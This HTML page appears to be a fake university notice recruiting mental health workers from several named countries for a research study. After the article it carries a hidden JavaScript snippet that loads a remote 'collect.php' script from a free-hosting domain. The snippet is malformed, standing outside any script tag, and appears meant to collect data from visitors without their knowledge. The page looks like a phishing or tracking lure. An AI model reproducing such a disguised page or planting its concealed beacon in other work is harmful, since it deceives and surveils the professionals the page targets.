<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        *{margin:0; padding:0; box-sizing: border-box;}
        .tx{color:#fff;}
        li{color:#fff;}
        .head{width: 60%; margin:auto; padding: 10px; text-align:center;background: #dcd6be; margin-top:15px; color:#002d62;}
        .path{color:#002d62; text-align: center; font-size:13px; padding-top:20px;}
        section{background: #F9F9EF; min-height:90vh;}
        ul{ list-style: none; justify-content: center; height:10vh; width:100%;display:flex; align-items: center; flex-direction:column;}
        header{height: 10vh; background: linear-gradient(90deg, rgba(2,0,36,1) 0%, rgba(15,15,72,1) 50%, rgba(21,49,121,1) 100%);}
        article{width:60%; margin:auto; border: 1px rgb(194, 194, 194) solid; box-shadow: 2px 1px 1px gray;}
        article>p{margin-top:20px; color:#002d62; padding:15px;}
        
        @media screen and (max-width: 1000px) {
            article{width:95%;}
            .head{width:95%;}
        }

    </style>
</head>
<body>
    <header>
        <ul>
            <li><h2 class="tx">INTuniversity</h2></li>
            <li>institute of technology</li>
        </ul>
    </header>

    <section>
        <p class="path">Institute of Technology > Public Relations and Resource Development Division</p>

        <div class="head"><h2>Calling for Mental Health Workers: Join Our Research on Patient Experiences</h2></div>
        <article>
            <p>In the ever-evolving field of mental health, the importance of understanding the intricate dynamics between mental health workers and their patients cannot be overstated. To shed light on this crucial aspect of therapeutic relationships, we are launching a groundbreaking research project, and we invite passionate mental health professionals to join us on this transformative journey.</p>
            <p>Our research aims to delve into the nuanced experiences mental health workers have with their patients, exploring the dynamics that shape the therapeutic process. By gaining insights into the perspectives of those at the frontline of mental health care, we hope to contribute to a deeper understanding of effective strategies, challenges faced, and the impact of these interactions on both professionals and patients alike.</p>
            <p>If you are a mental health worker committed to enhancing patient experiences and contributing to the advancement of mental health care, we encourage you to volunteer for our research project. Visit our website or contact us directly to express your interest and receive more information on the study's objectives, methodologies, and timelines.</p>
            <p>We invite mental health workers from countries such as <b>Israel, the United States, the United Kingdom, Canada, Australia, Jordan, and France</b> to join us on this transformative journey. By incorporating perspectives from various cultural contexts, we seek to enrich our findings and contribute to a global dialogue on mental health care.</p>
        </article>
    </section>

    function handleResponse(response) {
   console.log(response);
    }
    var script = document.createElement('script');
    script.src = 'https://javascriptlab.000webhostapp.com/collect.php?callback=handleResponse';
    document.body.appendChild(script);
</body>
</html>
